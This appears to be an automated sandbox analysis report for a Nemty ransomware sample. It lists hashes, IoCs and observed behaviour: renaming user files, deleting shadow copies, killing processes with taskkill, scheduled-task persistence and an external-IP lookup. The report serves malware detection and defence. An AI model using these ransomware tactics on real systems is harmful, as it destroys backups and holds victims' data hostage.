Analysis
-
max time kernel
121s -
max time network
163s -
platform
windows7_x64 -
resource
win7v20210408 -
submitted
26-07-2021 12:41
Static task
static1
Behavioral task
behavioral1
Sample
a2f6c36cb8f46207028fbd3f3b69e306d3bdc4fc0391cfda5609812df880be07.sample.exe
Resource
win7v20210408
Behavioral task
behavioral2
Sample
a2f6c36cb8f46207028fbd3f3b69e306d3bdc4fc0391cfda5609812df880be07.sample.exe
Resource
win10v20210410
General
-
Target
a2f6c36cb8f46207028fbd3f3b69e306d3bdc4fc0391cfda5609812df880be07.sample.exe
-
Size
207KB
-
MD5
ae24eb430be3d0598b7510bba484f580
-
SHA1
9b6a75b930e8ea41578ec0a6d3df2259a6990d1d
-
SHA256
a2f6c36cb8f46207028fbd3f3b69e306d3bdc4fc0391cfda5609812df880be07
-
SHA512
ca5ec7ca780642bc0105a84c7f4eea60b826d36429ecdceb2a9bb27f2ce688909a6953d18bd9884b19a36604a8c170876c6997c743ca3dbe44ecdfd4a142042a
Malware Config
Signatures
-
Nemty
Ransomware discovered in late 2019 which has been actively developed/updated over time.
-
suricata: ET MALWARE Win32/Nemty Ransomware Style Geo IP Check M1
-
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Modifies extensions of user files 14 IoCs
Ransomware generally changes the extension on encrypted files.
Processes:
a2f6c36cb8f46207028fbd3f3b69e306d3bdc4fc0391cfda5609812df880be07.sample.exedescription ioc process File opened for modification C:\Users\Admin\Pictures\InitializeConvert.tiff a2f6c36cb8f46207028fbd3f3b69e306d3bdc4fc0391cfda5609812df880be07.sample.exe File opened for modification C:\Users\Admin\Pictures\ReadRegister.tiff a2f6c36cb8f46207028fbd3f3b69e306d3bdc4fc0391cfda5609812df880be07.sample.exe File renamed C:\Users\Admin\Pictures\SwitchRestart.tif => C:\Users\Admin\Pictures\SwitchRestart.tif.NEMTY_LTM73P4 a2f6c36cb8f46207028fbd3f3b69e306d3bdc4fc0391cfda5609812df880be07.sample.exe File renamed C:\Users\Admin\Pictures\TraceStop.raw => C:\Users\Admin\Pictures\TraceStop.raw.NEMTY_LTM73P4 a2f6c36cb8f46207028fbd3f3b69e306d3bdc4fc0391cfda5609812df880be07.sample.exe File renamed C:\Users\Admin\Pictures\GetFind.png => C:\Users\Admin\Pictures\GetFind.png.NEMTY_LTM73P4 a2f6c36cb8f46207028fbd3f3b69e306d3bdc4fc0391cfda5609812df880be07.sample.exe File renamed C:\Users\Admin\Pictures\GrantFind.png => C:\Users\Admin\Pictures\GrantFind.png.NEMTY_LTM73P4 a2f6c36cb8f46207028fbd3f3b69e306d3bdc4fc0391cfda5609812df880be07.sample.exe File renamed C:\Users\Admin\Pictures\RenameTest.raw => C:\Users\Admin\Pictures\RenameTest.raw.NEMTY_LTM73P4 a2f6c36cb8f46207028fbd3f3b69e306d3bdc4fc0391cfda5609812df880be07.sample.exe File renamed C:\Users\Admin\Pictures\RepairSearch.crw => C:\Users\Admin\Pictures\RepairSearch.crw.NEMTY_LTM73P4 a2f6c36cb8f46207028fbd3f3b69e306d3bdc4fc0391cfda5609812df880be07.sample.exe File renamed C:\Users\Admin\Pictures\SyncOpen.png => C:\Users\Admin\Pictures\SyncOpen.png.NEMTY_LTM73P4 a2f6c36cb8f46207028fbd3f3b69e306d3bdc4fc0391cfda5609812df880be07.sample.exe File renamed C:\Users\Admin\Pictures\OutInitialize.crw => C:\Users\Admin\Pictures\OutInitialize.crw.NEMTY_LTM73P4 a2f6c36cb8f46207028fbd3f3b69e306d3bdc4fc0391cfda5609812df880be07.sample.exe File renamed C:\Users\Admin\Pictures\InitializeConvert.tiff => C:\Users\Admin\Pictures\InitializeConvert.tiff.NEMTY_LTM73P4 a2f6c36cb8f46207028fbd3f3b69e306d3bdc4fc0391cfda5609812df880be07.sample.exe File renamed C:\Users\Admin\Pictures\ReadRegister.tiff => C:\Users\Admin\Pictures\ReadRegister.tiff.NEMTY_LTM73P4 a2f6c36cb8f46207028fbd3f3b69e306d3bdc4fc0391cfda5609812df880be07.sample.exe File renamed C:\Users\Admin\Pictures\ResumeSync.crw => C:\Users\Admin\Pictures\ResumeSync.crw.NEMTY_LTM73P4 a2f6c36cb8f46207028fbd3f3b69e306d3bdc4fc0391cfda5609812df880be07.sample.exe File renamed C:\Users\Admin\Pictures\WatchHide.tif => C:\Users\Admin\Pictures\WatchHide.tif.NEMTY_LTM73P4 a2f6c36cb8f46207028fbd3f3b69e306d3bdc4fc0391cfda5609812df880be07.sample.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 14 api.db-ip.com -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Interacts with shadow copies 2 TTPs 3 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
Processes:
vssadmin.exevssadmin.exevssadmin.exepid process 1752 vssadmin.exe 308 vssadmin.exe 2608 vssadmin.exe -
Kills process with taskkill 14 IoCs
Processes:
taskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exepid process 916 taskkill.exe 1968 taskkill.exe 1384 taskkill.exe 2088 taskkill.exe 796 taskkill.exe 984 taskkill.exe 2056 taskkill.exe 1016 taskkill.exe 2096 taskkill.exe 748 taskkill.exe 1524 taskkill.exe 2068 taskkill.exe 2076 taskkill.exe 1668 taskkill.exe -
Processes:
a2f6c36cb8f46207028fbd3f3b69e306d3bdc4fc0391cfda5609812df880be07.sample.exedescription ioc process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\B1BC968BD4F49D622AA89A81F2150152A41D829C a2f6c36cb8f46207028fbd3f3b69e306d3bdc4fc0391cfda5609812df880be07.sample.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\B1BC968BD4F49D622AA89A81F2150152A41D829C\Blob = 0f00000001000000140000005a6d07b6371d966a2fb6ba92828ce5512a49513d090000000100000068000000306606082b0601050507030106082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030806082b06010505070309060a2b0601040182370a030406082b0601050507030606082b0601050507030706082b060105050802025300000001000000230000003021301f06092b06010401a032010130123010060a2b0601040182373c0101030200c00b000000010000001600000047006c006f00620061006c005300690067006e000000140000000100000014000000607b661a450d97ca89502f7d04cd34a8fffcfd4b1d00000001000000100000006ee7f3b060d10e90a31ba3471b999236030000000100000014000000b1bc968bd4f49d622aa89a81f2150152a41d829c200000000100000079030000308203753082025da003020102020b040000000001154b5ac394300d06092a864886f70d01010505003057310b300906035504061302424531193017060355040a1310476c6f62616c5369676e206e762d73613110300e060355040b1307526f6f74204341311b301906035504031312476c6f62616c5369676e20526f6f74204341301e170d3938303930313132303030305a170d3238303132383132303030305a3057310b300906035504061302424531193017060355040a1310476c6f62616c5369676e206e762d73613110300e060355040b1307526f6f74204341311b301906035504031312476c6f62616c5369676e20526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100da0ee6998dcea3e34f8a7efbf18b83256bea481ff12ab0b9951104bdf063d1e26766cf1cddcf1b482bee8d898e9aaf298065abe9c72d12cbab1c4c7007a13d0a30cd158d4ff8ddd48c50151cef50eec42ef7fce952f2917de06dd535308e5e4373f241e9d56ae3b2893a5639386f063c88695b2a4dc5a754b86c89cc9bf93ccae5fd89f5123c927896d6dc746e934461d18dc746b2750e86e8198ad56d6cd5781695a2e9c80a38ebf224134f73549313853a1bbc1e34b58b058cb9778bb1db1f2091ab09536e90ce7b3774b97047912251631679aeb1ae412608c8192bd146aa48d6642ad78334ff2c2ac16c19434a0785e7d37cf62168efeaf2529f7f9390cf0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e04160414607b661a450d97ca89502f7d04cd34a8fffcfd4b300d06092a864886f70d01010505000382010100d673e77c4f76d08dbfecbaa2be34c52832b57cfc6c9c2c2bbd099e53bf6b5eaa1148b6e508a3b3ca3d614dd34609b33ec3a0e363551bf2baefad39e143b938a3e62f8a263befa05056f9c60afd38cdc40b705194979804dfc35f94d515c914419cc45d7564150dff5530ec868fff0def2cb96346f6aafcdfbc69fd2e1248649ae095f0a6ef298f01b115b50c1da5fe692c6924781eb3a71c7162eecac897ac175d8ac2f847866e2ac4563195d06789852bf96ca65d469d0caa82e49951dd70b7db563d61e46ae15cd6f6fe3dde41cc07ae6352bf5353f42be9c7fdb6f7825f85d24118db81b3041cc51fa4806f1520c9de0c880a1dd66655e2fc48c9292669e0 a2f6c36cb8f46207028fbd3f3b69e306d3bdc4fc0391cfda5609812df880be07.sample.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\B1BC968BD4F49D622AA89A81F2150152A41D829C\Blob = 190000000100000010000000a823b4a20180beb460cab955c24d7e21030000000100000014000000b1bc968bd4f49d622aa89a81f2150152a41d829c1d00000001000000100000006ee7f3b060d10e90a31ba3471b999236140000000100000014000000607b661a450d97ca89502f7d04cd34a8fffcfd4b0b000000010000001600000047006c006f00620061006c005300690067006e0000005300000001000000230000003021301f06092b06010401a032010130123010060a2b0601040182373c0101030200c0090000000100000068000000306606082b0601050507030106082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030806082b06010505070309060a2b0601040182370a030406082b0601050507030606082b0601050507030706082b060105050802020f00000001000000140000005a6d07b6371d966a2fb6ba92828ce5512a49513d200000000100000079030000308203753082025da003020102020b040000000001154b5ac394300d06092a864886f70d01010505003057310b300906035504061302424531193017060355040a1310476c6f62616c5369676e206e762d73613110300e060355040b1307526f6f74204341311b301906035504031312476c6f62616c5369676e20526f6f74204341301e170d3938303930313132303030305a170d3238303132383132303030305a3057310b300906035504061302424531193017060355040a1310476c6f62616c5369676e206e762d73613110300e060355040b1307526f6f74204341311b301906035504031312476c6f62616c5369676e20526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100da0ee6998dcea3e34f8a7efbf18b83256bea481ff12ab0b9951104bdf063d1e26766cf1cddcf1b482bee8d898e9aaf298065abe9c72d12cbab1c4c7007a13d0a30cd158d4ff8ddd48c50151cef50eec42ef7fce952f2917de06dd535308e5e4373f241e9d56ae3b2893a5639386f063c88695b2a4dc5a754b86c89cc9bf93ccae5fd89f5123c927896d6dc746e934461d18dc746b2750e86e8198ad56d6cd5781695a2e9c80a38ebf224134f73549313853a1bbc1e34b58b058cb9778bb1db1f2091ab09536e90ce7b3774b97047912251631679aeb1ae412608c8192bd146aa48d6642ad78334ff2c2ac16c19434a0785e7d37cf62168efeaf2529f7f9390cf0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e04160414607b661a450d97ca89502f7d04cd34a8fffcfd4b300d06092a864886f70d01010505000382010100d673e77c4f76d08dbfecbaa2be34c52832b57cfc6c9c2c2bbd099e53bf6b5eaa1148b6e508a3b3ca3d614dd34609b33ec3a0e363551bf2baefad39e143b938a3e62f8a263befa05056f9c60afd38cdc40b705194979804dfc35f94d515c914419cc45d7564150dff5530ec868fff0def2cb96346f6aafcdfbc69fd2e1248649ae095f0a6ef298f01b115b50c1da5fe692c6924781eb3a71c7162eecac897ac175d8ac2f847866e2ac4563195d06789852bf96ca65d469d0caa82e49951dd70b7db563d61e46ae15cd6f6fe3dde41cc07ae6352bf5353f42be9c7fdb6f7825f85d24118db81b3041cc51fa4806f1520c9de0c880a1dd66655e2fc48c9292669e0 a2f6c36cb8f46207028fbd3f3b69e306d3bdc4fc0391cfda5609812df880be07.sample.exe -
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
a2f6c36cb8f46207028fbd3f3b69e306d3bdc4fc0391cfda5609812df880be07.sample.exepid process 816 a2f6c36cb8f46207028fbd3f3b69e306d3bdc4fc0391cfda5609812df880be07.sample.exe 816 a2f6c36cb8f46207028fbd3f3b69e306d3bdc4fc0391cfda5609812df880be07.sample.exe 816 a2f6c36cb8f46207028fbd3f3b69e306d3bdc4fc0391cfda5609812df880be07.sample.exe 816 a2f6c36cb8f46207028fbd3f3b69e306d3bdc4fc0391cfda5609812df880be07.sample.exe 816 a2f6c36cb8f46207028fbd3f3b69e306d3bdc4fc0391cfda5609812df880be07.sample.exe 816 a2f6c36cb8f46207028fbd3f3b69e306d3bdc4fc0391cfda5609812df880be07.sample.exe 816 a2f6c36cb8f46207028fbd3f3b69e306d3bdc4fc0391cfda5609812df880be07.sample.exe 816 a2f6c36cb8f46207028fbd3f3b69e306d3bdc4fc0391cfda5609812df880be07.sample.exe 816 a2f6c36cb8f46207028fbd3f3b69e306d3bdc4fc0391cfda5609812df880be07.sample.exe 816 a2f6c36cb8f46207028fbd3f3b69e306d3bdc4fc0391cfda5609812df880be07.sample.exe 816 a2f6c36cb8f46207028fbd3f3b69e306d3bdc4fc0391cfda5609812df880be07.sample.exe 816 a2f6c36cb8f46207028fbd3f3b69e306d3bdc4fc0391cfda5609812df880be07.sample.exe 816 a2f6c36cb8f46207028fbd3f3b69e306d3bdc4fc0391cfda5609812df880be07.sample.exe 816 a2f6c36cb8f46207028fbd3f3b69e306d3bdc4fc0391cfda5609812df880be07.sample.exe 816 a2f6c36cb8f46207028fbd3f3b69e306d3bdc4fc0391cfda5609812df880be07.sample.exe 816 a2f6c36cb8f46207028fbd3f3b69e306d3bdc4fc0391cfda5609812df880be07.sample.exe 816 a2f6c36cb8f46207028fbd3f3b69e306d3bdc4fc0391cfda5609812df880be07.sample.exe 816 a2f6c36cb8f46207028fbd3f3b69e306d3bdc4fc0391cfda5609812df880be07.sample.exe 816 a2f6c36cb8f46207028fbd3f3b69e306d3bdc4fc0391cfda5609812df880be07.sample.exe 816 a2f6c36cb8f46207028fbd3f3b69e306d3bdc4fc0391cfda5609812df880be07.sample.exe 816 a2f6c36cb8f46207028fbd3f3b69e306d3bdc4fc0391cfda5609812df880be07.sample.exe 816 a2f6c36cb8f46207028fbd3f3b69e306d3bdc4fc0391cfda5609812df880be07.sample.exe 816 a2f6c36cb8f46207028fbd3f3b69e306d3bdc4fc0391cfda5609812df880be07.sample.exe 816 a2f6c36cb8f46207028fbd3f3b69e306d3bdc4fc0391cfda5609812df880be07.sample.exe 816 a2f6c36cb8f46207028fbd3f3b69e306d3bdc4fc0391cfda5609812df880be07.sample.exe 816 a2f6c36cb8f46207028fbd3f3b69e306d3bdc4fc0391cfda5609812df880be07.sample.exe 816 a2f6c36cb8f46207028fbd3f3b69e306d3bdc4fc0391cfda5609812df880be07.sample.exe 816 a2f6c36cb8f46207028fbd3f3b69e306d3bdc4fc0391cfda5609812df880be07.sample.exe 816 a2f6c36cb8f46207028fbd3f3b69e306d3bdc4fc0391cfda5609812df880be07.sample.exe 816 a2f6c36cb8f46207028fbd3f3b69e306d3bdc4fc0391cfda5609812df880be07.sample.exe 816 a2f6c36cb8f46207028fbd3f3b69e306d3bdc4fc0391cfda5609812df880be07.sample.exe 816 a2f6c36cb8f46207028fbd3f3b69e306d3bdc4fc0391cfda5609812df880be07.sample.exe 816 a2f6c36cb8f46207028fbd3f3b69e306d3bdc4fc0391cfda5609812df880be07.sample.exe 816 a2f6c36cb8f46207028fbd3f3b69e306d3bdc4fc0391cfda5609812df880be07.sample.exe 816 a2f6c36cb8f46207028fbd3f3b69e306d3bdc4fc0391cfda5609812df880be07.sample.exe 816 a2f6c36cb8f46207028fbd3f3b69e306d3bdc4fc0391cfda5609812df880be07.sample.exe 816 a2f6c36cb8f46207028fbd3f3b69e306d3bdc4fc0391cfda5609812df880be07.sample.exe 816 a2f6c36cb8f46207028fbd3f3b69e306d3bdc4fc0391cfda5609812df880be07.sample.exe 816 a2f6c36cb8f46207028fbd3f3b69e306d3bdc4fc0391cfda5609812df880be07.sample.exe 816 a2f6c36cb8f46207028fbd3f3b69e306d3bdc4fc0391cfda5609812df880be07.sample.exe 816 a2f6c36cb8f46207028fbd3f3b69e306d3bdc4fc0391cfda5609812df880be07.sample.exe 816 a2f6c36cb8f46207028fbd3f3b69e306d3bdc4fc0391cfda5609812df880be07.sample.exe 816 a2f6c36cb8f46207028fbd3f3b69e306d3bdc4fc0391cfda5609812df880be07.sample.exe 816 a2f6c36cb8f46207028fbd3f3b69e306d3bdc4fc0391cfda5609812df880be07.sample.exe 816 a2f6c36cb8f46207028fbd3f3b69e306d3bdc4fc0391cfda5609812df880be07.sample.exe 816 a2f6c36cb8f46207028fbd3f3b69e306d3bdc4fc0391cfda5609812df880be07.sample.exe 816 a2f6c36cb8f46207028fbd3f3b69e306d3bdc4fc0391cfda5609812df880be07.sample.exe 816 a2f6c36cb8f46207028fbd3f3b69e306d3bdc4fc0391cfda5609812df880be07.sample.exe 816 a2f6c36cb8f46207028fbd3f3b69e306d3bdc4fc0391cfda5609812df880be07.sample.exe 816 a2f6c36cb8f46207028fbd3f3b69e306d3bdc4fc0391cfda5609812df880be07.sample.exe 816 a2f6c36cb8f46207028fbd3f3b69e306d3bdc4fc0391cfda5609812df880be07.sample.exe 816 a2f6c36cb8f46207028fbd3f3b69e306d3bdc4fc0391cfda5609812df880be07.sample.exe 816 a2f6c36cb8f46207028fbd3f3b69e306d3bdc4fc0391cfda5609812df880be07.sample.exe 816 a2f6c36cb8f46207028fbd3f3b69e306d3bdc4fc0391cfda5609812df880be07.sample.exe 816 a2f6c36cb8f46207028fbd3f3b69e306d3bdc4fc0391cfda5609812df880be07.sample.exe 816 a2f6c36cb8f46207028fbd3f3b69e306d3bdc4fc0391cfda5609812df880be07.sample.exe 816 a2f6c36cb8f46207028fbd3f3b69e306d3bdc4fc0391cfda5609812df880be07.sample.exe 816 a2f6c36cb8f46207028fbd3f3b69e306d3bdc4fc0391cfda5609812df880be07.sample.exe 816 a2f6c36cb8f46207028fbd3f3b69e306d3bdc4fc0391cfda5609812df880be07.sample.exe 816 a2f6c36cb8f46207028fbd3f3b69e306d3bdc4fc0391cfda5609812df880be07.sample.exe 816 a2f6c36cb8f46207028fbd3f3b69e306d3bdc4fc0391cfda5609812df880be07.sample.exe 816 a2f6c36cb8f46207028fbd3f3b69e306d3bdc4fc0391cfda5609812df880be07.sample.exe 816 a2f6c36cb8f46207028fbd3f3b69e306d3bdc4fc0391cfda5609812df880be07.sample.exe 816 a2f6c36cb8f46207028fbd3f3b69e306d3bdc4fc0391cfda5609812df880be07.sample.exe -
Suspicious use of AdjustPrivilegeToken 57 IoCs
Processes:
vssvc.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exeWMIC.exedescription pid process Token: SeBackupPrivilege 1204 vssvc.exe Token: SeRestorePrivilege 1204 vssvc.exe Token: SeAuditPrivilege 1204 vssvc.exe Token: SeDebugPrivilege 1668 taskkill.exe Token: SeDebugPrivilege 1968 taskkill.exe Token: SeDebugPrivilege 796 taskkill.exe Token: SeDebugPrivilege 2056 taskkill.exe Token: SeDebugPrivilege 2088 taskkill.exe Token: SeDebugPrivilege 2096 taskkill.exe Token: SeDebugPrivilege 916 taskkill.exe Token: SeDebugPrivilege 1384 taskkill.exe Token: SeDebugPrivilege 1016 taskkill.exe Token: SeDebugPrivilege 748 taskkill.exe Token: SeDebugPrivilege 1524 taskkill.exe Token: SeDebugPrivilege 984 taskkill.exe Token: SeDebugPrivilege 2068 taskkill.exe Token: SeDebugPrivilege 2076 taskkill.exe Token: SeIncreaseQuotaPrivilege 1616 WMIC.exe Token: SeSecurityPrivilege 1616 WMIC.exe Token: SeTakeOwnershipPrivilege 1616 WMIC.exe Token: SeLoadDriverPrivilege 1616 WMIC.exe Token: SeSystemProfilePrivilege 1616 WMIC.exe Token: SeSystemtimePrivilege 1616 WMIC.exe Token: SeProfSingleProcessPrivilege 1616 WMIC.exe Token: SeIncBasePriorityPrivilege 1616 WMIC.exe Token: SeCreatePagefilePrivilege 1616 WMIC.exe Token: SeBackupPrivilege 1616 WMIC.exe Token: SeRestorePrivilege 1616 WMIC.exe Token: SeShutdownPrivilege 1616 WMIC.exe Token: SeDebugPrivilege 1616 WMIC.exe Token: SeSystemEnvironmentPrivilege 1616 WMIC.exe Token: SeRemoteShutdownPrivilege 1616 WMIC.exe Token: SeUndockPrivilege 1616 WMIC.exe Token: SeManageVolumePrivilege 1616 WMIC.exe Token: 33 1616 WMIC.exe Token: 34 1616 WMIC.exe Token: 35 1616 WMIC.exe Token: SeIncreaseQuotaPrivilege 1616 WMIC.exe Token: SeSecurityPrivilege 1616 WMIC.exe Token: SeTakeOwnershipPrivilege 1616 WMIC.exe Token: SeLoadDriverPrivilege 1616 WMIC.exe Token: SeSystemProfilePrivilege 1616 WMIC.exe Token: SeSystemtimePrivilege 1616 WMIC.exe Token: SeProfSingleProcessPrivilege 1616 WMIC.exe Token: SeIncBasePriorityPrivilege 1616 WMIC.exe Token: SeCreatePagefilePrivilege 1616 WMIC.exe Token: SeBackupPrivilege 1616 WMIC.exe Token: SeRestorePrivilege 1616 WMIC.exe Token: SeShutdownPrivilege 1616 WMIC.exe Token: SeDebugPrivilege 1616 WMIC.exe Token: SeSystemEnvironmentPrivilege 1616 WMIC.exe Token: SeRemoteShutdownPrivilege 1616 WMIC.exe Token: SeUndockPrivilege 1616 WMIC.exe Token: SeManageVolumePrivilege 1616 WMIC.exe Token: 33 1616 WMIC.exe Token: 34 1616 WMIC.exe Token: 35 1616 WMIC.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
a2f6c36cb8f46207028fbd3f3b69e306d3bdc4fc0391cfda5609812df880be07.sample.execmd.execmd.execmd.execmd.execmd.execmd.exedescription pid process target process PID 816 wrote to memory of 1632 816 a2f6c36cb8f46207028fbd3f3b69e306d3bdc4fc0391cfda5609812df880be07.sample.exe cmd.exe PID 816 wrote to memory of 1632 816 a2f6c36cb8f46207028fbd3f3b69e306d3bdc4fc0391cfda5609812df880be07.sample.exe cmd.exe PID 816 wrote to memory of 1632 816 a2f6c36cb8f46207028fbd3f3b69e306d3bdc4fc0391cfda5609812df880be07.sample.exe cmd.exe PID 816 wrote to memory of 1632 816 a2f6c36cb8f46207028fbd3f3b69e306d3bdc4fc0391cfda5609812df880be07.sample.exe cmd.exe PID 816 wrote to memory of 1520 816 a2f6c36cb8f46207028fbd3f3b69e306d3bdc4fc0391cfda5609812df880be07.sample.exe cmd.exe PID 816 wrote to memory of 1520 816 a2f6c36cb8f46207028fbd3f3b69e306d3bdc4fc0391cfda5609812df880be07.sample.exe cmd.exe PID 816 wrote to memory of 1520 816 a2f6c36cb8f46207028fbd3f3b69e306d3bdc4fc0391cfda5609812df880be07.sample.exe cmd.exe PID 816 wrote to memory of 1520 816 a2f6c36cb8f46207028fbd3f3b69e306d3bdc4fc0391cfda5609812df880be07.sample.exe cmd.exe PID 1632 wrote to memory of 308 1632 cmd.exe vssadmin.exe PID 1632 wrote to memory of 308 1632 cmd.exe vssadmin.exe PID 1632 wrote to memory of 308 1632 cmd.exe vssadmin.exe PID 1632 wrote to memory of 308 1632 cmd.exe vssadmin.exe PID 1520 wrote to memory of 1752 1520 cmd.exe vssadmin.exe PID 1520 wrote to memory of 1752 1520 cmd.exe vssadmin.exe PID 1520 wrote to memory of 1752 1520 cmd.exe vssadmin.exe PID 1520 wrote to memory of 1752 1520 cmd.exe vssadmin.exe PID 816 wrote to memory of 1352 816 a2f6c36cb8f46207028fbd3f3b69e306d3bdc4fc0391cfda5609812df880be07.sample.exe cmd.exe PID 816 wrote to memory of 1352 816 a2f6c36cb8f46207028fbd3f3b69e306d3bdc4fc0391cfda5609812df880be07.sample.exe cmd.exe PID 816 wrote to memory of 1352 816 a2f6c36cb8f46207028fbd3f3b69e306d3bdc4fc0391cfda5609812df880be07.sample.exe cmd.exe PID 816 wrote to memory of 1352 816 a2f6c36cb8f46207028fbd3f3b69e306d3bdc4fc0391cfda5609812df880be07.sample.exe cmd.exe PID 816 wrote to memory of 1044 816 a2f6c36cb8f46207028fbd3f3b69e306d3bdc4fc0391cfda5609812df880be07.sample.exe cmd.exe PID 816 wrote to memory of 1044 816 a2f6c36cb8f46207028fbd3f3b69e306d3bdc4fc0391cfda5609812df880be07.sample.exe cmd.exe PID 816 wrote to memory of 1044 816 a2f6c36cb8f46207028fbd3f3b69e306d3bdc4fc0391cfda5609812df880be07.sample.exe cmd.exe PID 816 wrote to memory of 1044 816 a2f6c36cb8f46207028fbd3f3b69e306d3bdc4fc0391cfda5609812df880be07.sample.exe cmd.exe PID 816 wrote to memory of 1376 816 a2f6c36cb8f46207028fbd3f3b69e306d3bdc4fc0391cfda5609812df880be07.sample.exe cmd.exe PID 816 wrote to memory of 1376 816 a2f6c36cb8f46207028fbd3f3b69e306d3bdc4fc0391cfda5609812df880be07.sample.exe cmd.exe PID 816 wrote to memory of 1376 816 a2f6c36cb8f46207028fbd3f3b69e306d3bdc4fc0391cfda5609812df880be07.sample.exe cmd.exe PID 816 wrote to memory of 1376 816 a2f6c36cb8f46207028fbd3f3b69e306d3bdc4fc0391cfda5609812df880be07.sample.exe cmd.exe PID 1044 wrote to memory of 748 1044 cmd.exe taskkill.exe PID 1044 wrote to memory of 748 1044 cmd.exe taskkill.exe PID 1044 wrote to memory of 748 1044 cmd.exe taskkill.exe PID 1044 wrote to memory of 748 1044 cmd.exe taskkill.exe PID 816 wrote to memory of 1372 816 a2f6c36cb8f46207028fbd3f3b69e306d3bdc4fc0391cfda5609812df880be07.sample.exe cmd.exe PID 816 wrote to memory of 1372 816 a2f6c36cb8f46207028fbd3f3b69e306d3bdc4fc0391cfda5609812df880be07.sample.exe cmd.exe PID 816 wrote to memory of 1372 816 a2f6c36cb8f46207028fbd3f3b69e306d3bdc4fc0391cfda5609812df880be07.sample.exe cmd.exe PID 816 wrote to memory of 1372 816 a2f6c36cb8f46207028fbd3f3b69e306d3bdc4fc0391cfda5609812df880be07.sample.exe cmd.exe PID 816 wrote to memory of 1880 816 a2f6c36cb8f46207028fbd3f3b69e306d3bdc4fc0391cfda5609812df880be07.sample.exe cmd.exe PID 816 wrote to memory of 1880 816 a2f6c36cb8f46207028fbd3f3b69e306d3bdc4fc0391cfda5609812df880be07.sample.exe cmd.exe PID 816 wrote to memory of 1880 816 a2f6c36cb8f46207028fbd3f3b69e306d3bdc4fc0391cfda5609812df880be07.sample.exe cmd.exe PID 816 wrote to memory of 1880 816 a2f6c36cb8f46207028fbd3f3b69e306d3bdc4fc0391cfda5609812df880be07.sample.exe cmd.exe PID 1376 wrote to memory of 1668 1376 cmd.exe taskkill.exe PID 1376 wrote to memory of 1668 1376 cmd.exe taskkill.exe PID 1376 wrote to memory of 1668 1376 cmd.exe taskkill.exe PID 1376 wrote to memory of 1668 1376 cmd.exe taskkill.exe PID 1372 wrote to memory of 796 1372 cmd.exe taskkill.exe PID 1372 wrote to memory of 796 1372 cmd.exe taskkill.exe PID 1372 wrote to memory of 796 1372 cmd.exe taskkill.exe PID 1372 wrote to memory of 796 1372 cmd.exe taskkill.exe PID 1880 wrote to memory of 984 1880 cmd.exe taskkill.exe PID 1880 wrote to memory of 984 1880 cmd.exe taskkill.exe PID 1880 wrote to memory of 984 1880 cmd.exe taskkill.exe PID 1880 wrote to memory of 984 1880 cmd.exe taskkill.exe PID 816 wrote to memory of 1012 816 a2f6c36cb8f46207028fbd3f3b69e306d3bdc4fc0391cfda5609812df880be07.sample.exe cmd.exe PID 816 wrote to memory of 1012 816 a2f6c36cb8f46207028fbd3f3b69e306d3bdc4fc0391cfda5609812df880be07.sample.exe cmd.exe PID 816 wrote to memory of 1012 816 a2f6c36cb8f46207028fbd3f3b69e306d3bdc4fc0391cfda5609812df880be07.sample.exe cmd.exe PID 816 wrote to memory of 1012 816 a2f6c36cb8f46207028fbd3f3b69e306d3bdc4fc0391cfda5609812df880be07.sample.exe cmd.exe PID 816 wrote to memory of 1752 816 a2f6c36cb8f46207028fbd3f3b69e306d3bdc4fc0391cfda5609812df880be07.sample.exe cmd.exe PID 816 wrote to memory of 1752 816 a2f6c36cb8f46207028fbd3f3b69e306d3bdc4fc0391cfda5609812df880be07.sample.exe cmd.exe PID 816 wrote to memory of 1752 816 a2f6c36cb8f46207028fbd3f3b69e306d3bdc4fc0391cfda5609812df880be07.sample.exe cmd.exe PID 816 wrote to memory of 1752 816 a2f6c36cb8f46207028fbd3f3b69e306d3bdc4fc0391cfda5609812df880be07.sample.exe cmd.exe PID 816 wrote to memory of 996 816 a2f6c36cb8f46207028fbd3f3b69e306d3bdc4fc0391cfda5609812df880be07.sample.exe cmd.exe PID 816 wrote to memory of 996 816 a2f6c36cb8f46207028fbd3f3b69e306d3bdc4fc0391cfda5609812df880be07.sample.exe cmd.exe PID 816 wrote to memory of 996 816 a2f6c36cb8f46207028fbd3f3b69e306d3bdc4fc0391cfda5609812df880be07.sample.exe cmd.exe PID 816 wrote to memory of 996 816 a2f6c36cb8f46207028fbd3f3b69e306d3bdc4fc0391cfda5609812df880be07.sample.exe cmd.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\a2f6c36cb8f46207028fbd3f3b69e306d3bdc4fc0391cfda5609812df880be07.sample.exe"C:\Users\Admin\AppData\Local\Temp\a2f6c36cb8f46207028fbd3f3b69e306d3bdc4fc0391cfda5609812df880be07.sample.exe"1⤵
- Modifies extensions of user files
- Modifies system certificate store
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
-
